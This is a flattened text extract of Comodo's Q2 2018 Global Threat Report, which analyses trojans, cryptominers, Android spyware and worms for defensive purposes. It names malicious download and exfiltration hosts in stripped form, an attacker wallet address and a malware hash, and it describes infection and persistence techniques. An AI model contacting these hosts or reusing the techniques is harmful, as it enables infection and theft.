About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 5 of 73
Distribution of top 30 Malware Families
In this list of 30 top malware families where trojans overwhelmingly dominate you can find samples of this malware exhibiting diverse types of malicious activity
For example the leader of the attacks in Q2 TrojWareWin32Agent is a trojan family that clandestinely penetrates usersrsquo computers and then downloads other malware from a cybercriminal server And the downloaded malware can be of any type
Number two in the list TrojWareJSClickjack exhibits different activity it makes users unintentionally click on hidden links The link can be just another advertisement or lead to a malicious website to infect users with other types of malware
TrojWareJSFaceliker just clicks posts in Facebook on behalf of the user to promote fake or fraudulent pages The malware infects then usersrsquo browsers when they visit malicious or compromised websites Then when infected users open Facebook Faceliker hijacks their ldquolikesrdquo
TrojWareWin32Kryptik steals information from computers and sends it to the cybercriminal Command-and-Control server
Global Threat Report Q2 2018 Edition
Page 6 of 73
TrojWareWin32Injector uses process injection as the main technique to take malicious actions Its mostly used to bypass security products
TrojWareJSDownloader consists of scripts that download and execute malware from the Internet Itrsquos usually spread via a phishing email
Such diversity of malicious activity of trojans and their special ability to hide have always made them one of the hardest malware to fight But in Q2-2018 they become even more sophisticated and dangerous Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community
First among the trends is an explosive mixture of trojans and phishing emails Earlier phishing emails mostly contained a link to a malicious website to lure victims to supply their credentials But today phishing emails have become a potent means of delivery for trojans and other malware These trojans steal credentials and private information by ferreting out infected machines in search of valuable data and then send it to cybercriminalsrsquo servers
The accompanying graph of the most popular malware spread via email Note that 18 of 20 are trojans
Distribution of Phishing Families of Malware
Global Threat Report Q2 2018 Edition
Page 7 of 73
21 The Most Widespread Trojan The most proliferated trojan TrojWareWin32Injector is designed to steal credentials from infected computers It was spread via fake email imitating a message from a shipping and trading company As seen in the screenshot the malware attached is carefully disguised with a plausible name and icon to look like a real scanned document
If a user takes the bait and runs the file it copies itself to appdata as D5E2DEE36C7Aexe then launches itself from that location and starts to gather credentials present in the system
It collects credentials and private data from known browsers email clients FTP clients WebDav SCP clients Then it sends all the collected data to the attackersrsquo server httpcallbedmlpackfarefrephp
The phishing email
Global Threat Report Q2 2018 Edition
Page 8 of 73
22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools
Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies
The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust
The phishing email
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
51 Strategic Threat Computer Worms A computer worm is like a virus but typically travels autonomously exploiting vulnerabilities in network defenses as it spreads across the Internet A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network However even worms without a payload can consume enormous bandwidth diminish network or local system resources and possibly cause a denial-of-service For this Q2 2018 Report we place Worms in a special category called ldquoStrategic Threatrdquo due to their ability to travel very quickly across the Internet and compromise many computers at once
Global Threat Report Q2 2018 Edition
Page 41 of 73
511 Generic Worms This section shows the worldrsquos most common computer worm detections covering generic worm-like activity that is not tied to a specific propagation vector
Brontok which has been plaguing our planet for over a decade ranked as the top computer Worm followed by Conficker Nimda and over 300 more
The bubble chart shows that in Q2 2018 Russia (ru) Turkey (tr) and India (in) were the countries with the highest number of Worm infections
And finally this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May) with Russian worm detections spread more evenly throughout Q2 2018
Global Threat Report Q2 2018 Edition
Page 42 of 73
512 Net Worms A ldquoNet Wormrdquo typically infects network shares (such as a remote hard drive or server) from which it can infect every computer that accesses it from a local area network (LAN) or company intranet
In Q2 2018 Allaple was the most common Net Worm detected which Microsoft describes as a ldquomulti-threaded polymorphicrdquo worm that can perform denial-of-service (DoS) attacks against websites
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2
The timeline above shows that Poland Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2 and that French detections were spread more evenly throughout the quarter
Global Threat Report Q2 2018 Edition
Page 43 of 73
513 Email Worms Email worms are nasty in that they can travel between victim computers for example via computer exploits and autorun functionality
This quarter the most common Email Worm by far was Runonce
The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
